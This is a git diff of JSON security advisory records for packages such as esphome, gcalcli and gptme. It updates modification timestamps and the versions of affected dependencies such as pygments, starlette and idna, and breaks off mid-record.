a/advisories/BREW-esphome-CVE-2025-68146.json +++ b/advisories/BREW-esphome-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2025-68146", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.1", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.0" + "resource_purl": "pkg:pypi/filelock@3.32.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.0", - "key": "pkg:pypi/filelock@3.32.0", + "subject_version": "3.32.2", + "key": "pkg:pypi/filelock@3.32.2", "resource": "filelock" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.0", - "key": "pkg:pypi/filelock@3.32.0", + "subject_version": "3.32.2", + "key": "pkg:pypi/filelock@3.32.2", "resource": "filelock" } ] diff --git a/advisories/BREW-esphome-CVE-2026-22701.json b/advisories/BREW-esphome-CVE-2026-22701.json index 083a6fedc50..ebc9aeb51a1 100644 --- a/advisories/BREW-esphome-CVE-2026-22701.json +++ b/advisories/BREW-esphome-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2026-22701", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.3", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.0" + "resource_purl": "pkg:pypi/filelock@3.32.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.0", - "key": "pkg:pypi/filelock@3.32.0", + "subject_version": "3.32.2", + "key": "pkg:pypi/filelock@3.32.2", "resource": "filelock" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.0", - "key": "pkg:pypi/filelock@3.32.0", + "subject_version": "3.32.2", + "key": "pkg:pypi/filelock@3.32.2", "resource": "filelock" } ] diff --git a/advisories/BREW-esphome-CVE-2026-23833.json b/advisories/BREW-esphome-CVE-2026-23833.json index bcc4a59982f..60cca7ad2e4 100644 --- a/advisories/BREW-esphome-CVE-2026-23833.json +++ b/advisories/BREW-esphome-CVE-2026-23833.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2026-23833", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "CVE-2026-23833", "GHSA-4h3h-63v6-88qx", @@ -44,22 +44,22 @@ "strategy": "git", "ecosystem": "GIT", "name": "https://github.com/esphome/esphome", - "subject_version": "2026.7.4", + "subject_version": "2026.8.0", "key": "https://github.com/esphome/esphome" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "esphome", - "subject_version": "2026.7.4", - "key": "pkg:pypi/esphome@2026.7.4" + "subject_version": "2026.8.0", + "key": "pkg:pypi/esphome@2026.8.0" } ] }, diff --git a/advisories/BREW-esphome-CVE-2026-4539.json b/advisories/BREW-esphome-CVE-2026-4539.json index c06b6331933..39206bf5432 100644 --- a/advisories/BREW-esphome-CVE-2026-4539.json +++ b/advisories/BREW-esphome-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2026-4539", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-esphome-CVE-2026-45409.json b/advisories/BREW-esphome-CVE-2026-45409.json index a8924c3b923..4aa2713f215 100644 --- a/advisories/BREW-esphome-CVE-2026-45409.json +++ b/advisories/BREW-esphome-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-esphome-CVE-2026-45409", "published": "2026-08-13T16:45:08Z", - "modified": "2026-08-13T16:45:08Z", + "modified": "2026-08-22T08:47:40Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-firebase-cli-CVE-2024-4128.json b/advisories/BREW-firebase-cli-CVE-2024-4128.json index 8b58a0743eb..cd18c56f5be 100644 --- a/advisories/BREW-firebase-cli-CVE-2024-4128.json +++ b/advisories/BREW-firebase-cli-CVE-2024-4128.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-firebase-cli-CVE-2024-4128", "published": "2026-08-13T16:47:26Z", - "modified": "2026-08-17T17:06:38Z", + "modified": "2026-08-22T08:49:55Z", "upstream": [ "GHSA-rcm2-22f3-pqv3", "CVE-2024-4128", @@ -44,8 +44,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "firebase-tools", - "subject_version": "15.27.0", - "key": "pkg:npm/firebase-tools@15.27.0" + "subject_version": "15.28.1", + "key": "pkg:npm/firebase-tools@15.28.1" } ] }, diff --git a/advisories/BREW-gcalcli-CVE-2026-59939.json b/advisories/BREW-gcalcli-CVE-2026-59939.json index e639b48aa10..561032a1b99 100644 --- a/advisories/BREW-gcalcli-CVE-2026-59939.json +++ b/advisories/BREW-gcalcli-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gcalcli-CVE-2026-59939", "published": "2026-08-13T16:49:07Z", - "modified": "2026-08-13T16:49:07Z", + "modified": "2026-08-22T08:51:31Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -92,6 +92,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-gptme-CVE-2015-8557.json b/advisories/BREW-gptme-CVE-2015-8557.json index 80f93ba8e8f..d2e2e4da76f 100644 --- a/advisories/BREW-gptme-CVE-2015-8557.json +++ b/advisories/BREW-gptme-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2015-8557", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-gptme-CVE-2020-7694.json b/advisories/BREW-gptme-CVE-2020-7694.json index 6e64a7641f2..77e61adacb2 100644 --- a/advisories/BREW-gptme-CVE-2020-7694.json +++ b/advisories/BREW-gptme-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2020-7694", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-gptme-CVE-2020-7695.json b/advisories/BREW-gptme-CVE-2020-7695.json index 6529fb15305..f0fa78a7eee 100644 --- a/advisories/BREW-gptme-CVE-2020-7695.json +++ b/advisories/BREW-gptme-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2020-7695", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.1" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.1", - "key": "pkg:pypi/uvicorn@0.52.1", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" } ] diff --git a/advisories/BREW-gptme-CVE-2021-20270.json b/advisories/BREW-gptme-CVE-2021-20270.json index 9e2760d6768..f0f199117b5 100644 --- a/advisories/BREW-gptme-CVE-2021-20270.json +++ b/advisories/BREW-gptme-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2021-20270", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-gptme-CVE-2021-27291.json b/advisories/BREW-gptme-CVE-2021-27291.json index 7d867d52b71..e2f9f51ed4c 100644 --- a/advisories/BREW-gptme-CVE-2021-27291.json +++ b/advisories/BREW-gptme-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2021-27291", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-gptme-CVE-2022-40896.json b/advisories/BREW-gptme-CVE-2022-40896.json index b277da38304..f0a523cb001 100644 --- a/advisories/BREW-gptme-CVE-2022-40896.json +++ b/advisories/BREW-gptme-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2022-40896", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-gptme-CVE-2023-29159.json b/advisories/BREW-gptme-CVE-2023-29159.json index 10bc238161a..bd2c10f4553 100644 --- a/advisories/BREW-gptme-CVE-2023-29159.json +++ b/advisories/BREW-gptme-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2023-29159", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.27.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2023-30798.json b/advisories/BREW-gptme-CVE-2023-30798.json index f32d099c1bc..85e039c4ab1 100644 --- a/advisories/BREW-gptme-CVE-2023-30798.json +++ b/advisories/BREW-gptme-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2023-30798", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.25.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2024-3651.json b/advisories/BREW-gptme-CVE-2024-3651.json index e9559550262..d4b43f25e72 100644 --- a/advisories/BREW-gptme-CVE-2024-3651.json +++ b/advisories/BREW-gptme-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2024-3651", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-gptme-CVE-2024-47874.json b/advisories/BREW-gptme-CVE-2024-47874.json index 9162a9bd0ef..782aa2ad239 100644 --- a/advisories/BREW-gptme-CVE-2024-47874.json +++ b/advisories/BREW-gptme-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2024-47874", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.40.0", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2025-54121.json b/advisories/BREW-gptme-CVE-2025-54121.json index fa01b8f87b2..f7fac80c9ad 100644 --- a/advisories/BREW-gptme-CVE-2025-54121.json +++ b/advisories/BREW-gptme-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2025-54121", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.47.2", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2025-62727.json b/advisories/BREW-gptme-CVE-2025-62727.json index e8254eece7d..0cbe7bccf7b 100644 --- a/advisories/BREW-gptme-CVE-2025-62727.json +++ b/advisories/BREW-gptme-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2025-62727", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.49.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-gptme-CVE-2026-28684.json b/advisories/BREW-gptme-CVE-2026-28684.json index eecf658c968..b9ecd73650f 100644 --- a/advisories/BREW-gptme-CVE-2026-28684.json +++ b/advisories/BREW-gptme-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-28684", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-gptme-CVE-2026-34450.json b/advisories/BREW-gptme-CVE-2026-34450.json index d62e24e4a3a..74c764bab7a 100644 --- a/advisories/BREW-gptme-CVE-2026-34450.json +++ b/advisories/BREW-gptme-CVE-2026-34450.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-34450", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-q5f5-3gjm-7mfm", "CVE-2026-34450", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.87.0", "resource": "anthropic", - "resource_purl": "pkg:pypi/anthropic@0.116.0" + "resource_purl": "pkg:pypi/anthropic@0.120.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "anthropic", - "subject_version": "0.116.0", - "key": "pkg:pypi/anthropic@0.116.0", + "subject_version": "0.120.2", + "key": "pkg:pypi/anthropic@0.120.2", "resource": "anthropic" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "anthropic", - "subject_version": "0.116.0", - "key": "pkg:pypi/anthropic@0.116.0", + "subject_version": "0.120.2", + "key": "pkg:pypi/anthropic@0.120.2", "resource": "anthropic" } ] diff --git a/advisories/BREW-gptme-CVE-2026-34452.json b/advisories/BREW-gptme-CVE-2026-34452.json index 4f012974e36..f9f85b70b9e 100644 --- a/advisories/BREW-gptme-CVE-2026-34452.json +++ b/advisories/BREW-gptme-CVE-2026-34452.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-34452", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-w828-4qhx-vxx3", "CVE-2026-34452", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.87.0", "resource": "anthropic", - "resource_purl": "pkg:pypi/anthropic@0.116.0" + "resource_purl": "pkg:pypi/anthropic@0.120.2" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "anthropic", - "subject_version": "0.116.0", - "key": "pkg:pypi/anthropic@0.116.0", + "subject_version": "0.120.2", + "key": "pkg:pypi/anthropic@0.120.2", "resource": "anthropic" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "anthropic", - "subject_version": "0.116.0", - "key": "pkg:pypi/anthropic@0.116.0", + "subject_version": "0.120.2", + "key": "pkg:pypi/anthropic@0.120.2", "resource": "anthropic" } ] diff --git a/advisories/BREW-gptme-CVE-2026-4539.json b/advisories/BREW-gptme-CVE-2026-4539.json index bd21daa2cf8..365420cd2c3 100644 --- a/advisories/BREW-gptme-CVE-2026-4539.json +++ b/advisories/BREW-gptme-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-4539", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-gptme-CVE-2026-45409.json b/advisories/BREW-gptme-CVE-2026-45409.json index 7f5de5a2d39..1f13f9149e3 100644 --- a/advisories/BREW-gptme-CVE-2026-45409.json +++ b/advisories/BREW-gptme-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-45409", "published": "2026-08-13T16:54:46Z", - "modified": "2026-08-13T16:54:46Z", + "modified": "2026-08-22T08:56:30Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-gptme-CVE-2026-48710.json b/advisories/BREW-gptme-CVE-2026-48710.json index b30be43fd35..89b360e3674 100644 --- a/advisories/BREW-gptme-CVE-2026-48710.json +++ b/advisories/BREW-gptme-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-gptme-CVE-2026-48710", "published": 